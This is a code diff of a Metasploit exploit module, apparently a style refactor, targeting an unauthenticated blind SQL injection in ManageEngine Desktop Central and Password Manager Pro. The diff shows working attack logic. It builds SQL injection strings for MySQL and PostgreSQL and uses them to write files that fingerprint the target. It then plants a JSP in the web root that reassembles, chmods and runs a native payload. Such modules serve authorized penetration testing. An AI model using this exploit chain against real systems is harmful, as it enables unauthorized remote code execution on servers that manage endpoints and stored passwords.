@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection",
+        'Name' => 'ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection',
         'Description' => %q{
           This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet,
           which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and
@@ -45,7 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/55' ]
         ],
         'Arch' => ARCH_X86,
-        'Platform' => %w{linux win},
         'Targets' => [
           [ 'Automatic', {} ],
           [
@@ -161,13 +160,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
     end
 
-    if datastore['WEB_ROOT']
-      web_root = datastore['WEB_ROOT']
-    else
-      web_root = @my_target['WebRoot']
-    end
+    web_root = datastore['WEB_ROOT'] || @my_target['WebRoot']
 
-    jsp_name = rand_text_alpha_lower(8) + ".jsp"
+    jsp_name = rand_text_alpha_lower(8) + '.jsp'
     fullpath = web_root + jsp_name
     inject_exec(fullpath)
     register_file_for_cleanup(fullpath.sub('../', ''))
@@ -181,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
     db_paths = {}
 
     res = send_request_cgi({
-      'uri' => normalize_uri("PassTrixMain.cc"),
+      'uri' => normalize_uri('PassTrixMain.cc'),
       'method' => 'GET'
     })
 
@@ -202,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def desktop_central_db_paths
     db_paths = {}
     res = send_request_cgi({
-      'uri' => normalize_uri("configurations.do"),
+      'uri' => normalize_uri('configurations.do'),
       'method' => 'GET'
     })
 
@@ -236,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
     file_path = mysql_path << rand_txt
 
     # @@version_compile_os will give us Win32 / Win64 if it's a Windows target
-    inject_sql("select @@version_compile_os into dumpfile '#{file_path}'", "mysql")
+    inject_sql("select @@version_compile_os into dumpfile '#{file_path}'", 'mysql')
 
     res = send_request_cgi({
       'uri' => normalize_uri(rand_txt),
@@ -266,7 +261,7 @@ class MetasploitModule < Msf::Exploit::Remote
     file_path = postgresql_path << rand_txt
 
     # version() will tell us if it's compiled by Visual C++ (Windows) or gcc (Linux)
-    inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
+    inject_sql("copy (select version()) to '#{file_path}'", 'postgresql')
 
     res = send_request_cgi({
       'uri' => normalize_uri(rand_txt),
@@ -296,7 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # OK, it's Password Manager Pro on Linux, probably using PostgreSQL and
     # no WEB_ROOT was provided. Let's try one of the defaults before bailing out.
     file_path = targets[5]['WebRoot'].dup << rand_txt
-    inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
+    inject_sql("copy (select version()) to '#{file_path}'", 'postgresql')
 
     res = send_request_cgi({
       'uri' => normalize_uri(rand_txt),
@@ -314,8 +309,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def pick_target
     return target if target.name != 'Automatic'
 
-    print_status("Selecting target, this might take a few seconds...")
-    rand_txt = rand_text_alpha_lower(8) << ".txt"
+    print_status('Selecting target, this might take a few seconds...')
+    rand_txt = rand_text_alpha_lower(8) << '.txt'
 
     paths = db_paths
 
@@ -344,34 +339,34 @@ class MetasploitModule < Msf::Exploit::Remote
   # Creates the JSP that will assemble the payload on the server
   #
   def generate_jsp_encoded(files)
-    native_payload_name = rand_text_alpha(rand(6) + 3)
+    native_payload_name = rand_text_alpha(rand(3..8))
     ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
-    var_raw = rand_text_alpha(rand(8) + 3)
-    var_ostream = rand_text_alpha(rand(8) + 3)
-    var_buf = rand_text_alpha(rand(8) + 3)
-    var_decoder = rand_text_alpha(rand(8) + 3)
-    var_tmp = rand_text_alpha(rand(8) + 3)
-    var_path = rand_text_alpha(rand(8) + 3)
-    var_proc2 = rand_text_alpha(rand(8) + 3)
-    var_files = rand_text_alpha(rand(8) + 3)
-    var_ch = rand_text_alpha(rand(8) + 3)
-    var_istream = rand_text_alpha(rand(8) + 3)
-    var_file = rand_text_alpha(rand(8) + 3)
+    var_raw = rand_text_alpha(rand(3..10))
+    var_ostream = rand_text_alpha(rand(3..10))
+    var_buf = rand_text_alpha(rand(3..10))
+    var_decoder = rand_text_alpha(rand(3..10))
+    var_tmp = rand_text_alpha(rand(3..10))
+    var_path = rand_text_alpha(rand(3..10))
+    var_proc2 = rand_text_alpha(rand(3..10))
+    var_files = rand_text_alpha(rand(3..10))
+    var_ch = rand_text_alpha(rand(3..10))
+    var_istream = rand_text_alpha(rand(3..10))
+    var_file = rand_text_alpha(rand(3..10))
 
-    files_decl = "{ "
+    files_decl = '{ '
     files.each { |file| files_decl << "\"#{file}\"," }
-    files_decl[-1] = "}"
+    files_decl[-1] = '}'
 
     if @my_target['Platform'] == 'linux'
-      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      chmod = %Q|
+      var_proc1 = Rex::Text.rand_text_alpha(rand(3..10))
+      chmod = %|
       Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
       Thread.sleep(200);
       |
 
-      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      cleanup = %Q|
+      var_proc3 = Rex::Text.rand_text_alpha(rand(3..10))
+      cleanup = %|
       Thread.sleep(200);
       Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
       |
@@ -380,7 +375,7 @@ class MetasploitModule < Msf::Exploit::Remote
       cleanup = ''
     end
 
-    jsp = %Q|
+    jsp = %|
     <%@page import="java.io.*"%>
     <%@page import="sun.misc.BASE64Decoder"%>
     <%
@@ -419,27 +414,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if @my_target['Database'] == 'postgresql'
       # Ruby's base64 encoding adds newlines at every 60 chars, strip them
-      [jsp].pack("m*").gsub(/\n/, '')
+      [jsp].pack('m*').gsub(/\n/, '')
     else
       # Assuming mysql, applying hex encoding instead
-      jsp.unpack("H*")[0]
+      jsp.unpack('H*')[0]
     end
   end
 
   def inject_sql(sqli_command, target = nil)
-    target = (target == nil) ? @my_target['Database'] : target
+    target = (target.nil?) ? @my_target['Database'] : target
     if target == 'postgresql'
-      sqli_prefix = "viewname\";"
-      sqli_suffix = ";-- "
+      sqli_prefix = 'viewname";'
+      sqli_suffix = ';-- '
     else
       # Assuming mysql
-      sqli_prefix = "viewname\" union "
-      sqli_suffix = "#"
+      sqli_prefix = 'viewname" union '
+      sqli_suffix = '#'
     end
 
     send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri("LinkViewFetchServlet.dat"),
+      'uri' => normalize_uri('LinkViewFetchServlet.dat'),
       'vars_get' => {
         'sv' => sqli_prefix << sqli_command << sqli_suffix
       }
@@ -456,11 +451,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Generate the actual payload
   def generate_exe_payload
-    opts = { :arch => @my_target.arch, :platform => @my_target.platform }
+    opts = { arch: @my_target.arch, platform: @my_target.platform }
     payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     if datastore['EXE_SMALL'] and @my_target['Platform'] == 'win'
       exe = Msf::Util::EXE.to_executable_fmt(framework, arch, platform,
-                                             payload.encoded, "exe-small", opts)
+                                             payload.encoded, 'exe-small', opts)
     else
       exe = generate_payload_exe(opts)
     end
@@ -489,12 +484,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # The Windows path has to be escaped with 4 backslashes because ruby eats one
     # and the JSP eats the other.
     files = Array.new(chunks)
-    files.map! do |file|
+    files.map! do |_file|
       if @my_target['Platform'] == 'win'
-        file = "C:\\\\windows\\\\system32\\\\" + rand_text_alpha(rand(8) + 3)
+        'C:\\\\windows\\\\system32\\\\' + rand_text_alpha(rand(3..10))
       else
         # Assuming Linux, let's hope we can write to /tmp
-        file = "/tmp/" + rand_text_alpha(rand(8) + 3)
+        '/tmp/' + rand_text_alpha(rand(3..10))
       end
     end
 
@@ -535,23 +530,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_desktop_central_8(body)
-    if body =~ /id="buildNum" value="([0-9]+)"\/>/
-      build = $1
+    if body =~ %r{id="buildNum" value="([0-9]+)"/>}
+      build = ::Regexp.last_match(1)
       if ver_gt(build, '80200')
         print_status("Detected Desktop Central v8 #{build}")
       else
         print_status("Detected Desktop Central v8 #{build} (MySQL)")
       end
     else
-      print_status("Detected Desktop Central v8 (MySQL)")
+      print_status('Detected Desktop Central v8 (MySQL)')
     end
     # DC v8 < 80200 uses the MySQL database
     Exploit::CheckCode::Appears
   end
 
   def check_desktop_central_9(body)
-    if body =~ /id="buildNum" value="([0-9]+)"\/>/
-      build = $1
+    if body =~ %r{id="buildNum" value="([0-9]+)"/>}
+      build = ::Regexp.last_match(1)
       print_status("Detected Desktop Central v9 #{build}")
       if ver_lt(build, '90039')
         return Exploit::CheckCode::Appears
@@ -564,7 +559,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Test for Desktop Central
   def check_desktop_central
     res = send_request_cgi({
-      'uri' => normalize_uri("configurations.do"),
+      'uri' => normalize_uri('configurations.do'),
       'method' => 'GET'
     })
 
@@ -575,7 +570,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
        res.body.to_s =~ /ManageEngine Desktop Central MSP 7/
       # DC v7 uses the MySQL database
-      print_status("Detected Desktop Central v7 (MySQL)")
+      print_status('Detected Desktop Central v7 (MySQL)')
       return Exploit::CheckCode::Appears
     elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
           res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
@@ -591,7 +586,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Test for Password Manager Pro
   def check_password_manager_pro
     res = send_request_cgi({
-      'uri' => normalize_uri("PassTrixMain.cc"),
+      'uri' => normalize_uri('PassTrixMain.cc'),
       'method' => 'GET'
     })
 
@@ -600,9 +595,9 @@ class MetasploitModule < Msf::Exploit::Remote
        (
          res.body.to_s =~ /login\.css\?([0-9]+)/ ||                            # PMP v6
          res.body.to_s =~ /login\.css\?version=([0-9]+)/ ||                    # PMP v6
-         res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7
+         res.body.to_s =~ %r{/themes/passtrix/V([0-9]+)/styles/login\.css"} # PMP v7
        )
-      build = $1
+      build = ::Regexp.last_match(1)
     else
       return Exploit::CheckCode::Unknown
     end
